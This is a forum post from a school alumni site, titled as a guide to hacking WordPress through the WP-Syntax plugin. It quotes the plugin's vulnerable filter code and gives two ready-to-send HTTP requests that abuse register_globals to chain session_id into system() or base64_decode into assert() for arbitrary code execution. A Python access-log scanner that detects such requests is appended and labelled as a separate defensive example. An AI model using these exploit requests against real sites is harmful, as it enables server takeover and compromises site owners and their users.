FORUM SMP 1 WONOSARI


=> This is a forum for students and alumni of SMP 1 WONOSARI! Anyone who wants to reminisce or share stories can do it in this forum! Come and liven it up! <=


    How to Hack WordPress - Use WP-Syntax


    Post by Admin Sun 11 Apr 2010 - 4:12

    Code:
    The weak point/bug is in the code at test/index.php@132-150:

    ...
    function apply_filters($tag, $string)
    {
        global $test_filter;

        if (!isset($test_filter[$tag])) return $string;

        uksort($test_filter[$tag], "strnatcasecmp");

        foreach ($test_filter[$tag] as $priority => $functions)
        {
            if (is_null($functions)) continue;

            foreach ($functions as $function)
            {
                $string = call_user_func_array($function, array($string));
            }
        }
        return $string;
    }
    ...

    Explanation:
    The global variable test_filter is not defined, so register_globals = on
    makes it possible to pass an arbitrary value into the first parameter of
    call_user_func_array(). Considering the fact that this function is
    called in a loop and the returned value is assigned to the second parameter
    on every iteration, it is obvious that a user function can be called with
    a single parameter containing arbitrary data that can come from the
    environment, e.g. the session id. There are several valid sequences of function
    calls that allow any code to be executed.

    ==============================[1]=====================================
    GET /wp-content/plugins/wp-syntax/test/index.php?test_filter[wp_head][99][0]=session_start&test_filter[wp_head][99][1]=session_id&test_filter[wp_head][99][2]=system HTTP/1.0
    Host: localhost
    Cookie: PHPSESSID=dir
    Connection: close

    Initially session_start() is called, then the return value of session_id(), which
    contains the command to execute, is passed to system().

    ==============================[2]=====================================
    /wp-content/index.php?test_filter[wp_head][99][]=session_start&test_filter[wp_head][99][0]=session_id&test_filter[wp_head][99][1]=base64_decode&test_filter[wp_head][99][2]=assert&q=phpinfo();exit;

    This vector was found by ShAnKaR and improves on the previous one by using
    a base64-encoded payload, which broadens the character range that can be passed
    to the next function. Besides, assert() successfully executes arbitrary
    code when called through call_user_func_array(), while the use of eval() in
    this function is not possible.
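
A log check for the request shape described in the post above, as an added example that is not part of the original post or of the plugin: it flags access-log requests whose query string would populate `$test_filter` when register_globals is on. The log lines are constructed, and the names `scan`, `php_base_name` and the combined-log layout are assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote

WATCHED_GLOBAL = "test_filter"   # uninitialised global named in the post
TEST_DIR = "/wp-syntax/test/"    # plugin test directory named in the post
# Request field of a combined-format access log line (assumed layout).
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')


def php_base_name(key):
    """Variable name PHP derives from a request key such as 'a.b[x][]'."""
    base = key.lstrip(" ").split("[", 1)[0]
    # PHP rewrites dots and spaces in incoming names to underscores.
    return base.replace(".", "_").replace(" ", "_")


def scan(lines):
    """Return one finding per request that sets the watched global."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        path, _, query = match.group("target").partition("?")
        # parse_qsl percent-decodes, so test%5Ffilter%5B...%5D is caught too.
        keys = [k for k, _ in parse_qsl(query, keep_blank_values=True)
                if php_base_name(k) == WATCHED_GLOBAL]
        if keys:
            findings.append({"line": number, "keys": keys,
                             "in_test_dir": TEST_DIR in unquote(path)})
    return findings


# Constructed sample lines (documentation IP ranges, harmless function names).
SAMPLE_LOG = [
    '192.0.2.10 - - [11/Apr/2010:04:12:00 +0000] "GET /wp-content/plugins/'
    'wp-syntax/test/index.php?test_filter[wp_head][99][0]=strtoupper HTTP/1.0" 200 512',
    '192.0.2.10 - - [11/Apr/2010:04:12:05 +0000] "GET /index.php?'
    'test%5Ffilter%5Bwp_head%5D%5B99%5D%5B%5D=strtoupper HTTP/1.1" 200 512',
    '198.51.100.7 - - [11/Apr/2010:04:13:00 +0000] "GET /index.php?'
    'test.filter[x][1][0]=trim HTTP/1.1" 200 512',
    '198.51.100.7 - - [11/Apr/2010:04:14:00 +0000] "GET /?s=test_filter+plugin HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

With register_globals on, the same variable can also arrive in a POST body or a cookie, which standard access logs do not record, so a clean scan does not rule the request out.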
